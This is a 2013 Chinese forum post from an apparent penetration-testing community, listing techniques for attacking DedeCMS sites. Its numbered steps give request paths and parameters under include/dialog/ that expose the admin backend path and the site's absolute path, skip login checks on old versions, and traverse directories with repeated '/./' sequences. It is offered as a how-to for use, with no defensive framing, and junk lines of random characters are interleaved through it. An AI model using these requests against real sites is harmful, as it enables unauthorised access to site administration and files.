中国网络渗透测试联盟
标题:
dedecms爆后台文件技巧
[打印本页]
作者:
admin
时间:
2013-4-16 16:50
标题:
dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
2 Y9 o' f3 ~9 B! X& {4 @6 n" N( k+ D
* O* p+ @3 t5 c& H; S
员帐号,新版本的就直接转向了后台.
5 A* ~6 C/ v) f9 j. Z$ A4 J
% g5 e3 }+ _1 K8 o }3 r t
2.include/dialog/config.php会爆出后台管理路径
* J9 O4 h" S' v* N
, d: T' j S6 G0 P4 _5 i
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
, F% ]: d3 P) w+ h+ c- d. H
4 Q/ _! t4 E& ?% A
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
2 O9 |5 `( m" _" K4 Q( u+ z
8 z" F" e% `. c0 D1 T, _4 F
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
9 t5 f1 C3 ?% @' V
4 \1 k5 _% K# D: @. Y/ K* O
到根目录去.不过这些版本的访问地址有些不同.
0 x) s; R& R: W3 y6 r
地址为require/dialog/select_soft.php?activepath=/././././././././
, h3 A+ R4 @9 Q( [
4 c- K1 O" E' o. e) l" Z& Y
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
* `8 i* ~7 |% m4 W1 ?+ p
存在相同问题的文件还有
, j" ?# ^- g6 z
include\dialog\select_images.php
- K6 H1 P3 t7 V7 @+ S
include\dialog\select_media.php
& M/ L: [4 Y& K+ |" D
include\dialog\select_templets.php
2 O- e r$ s" t* p5 P- m
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2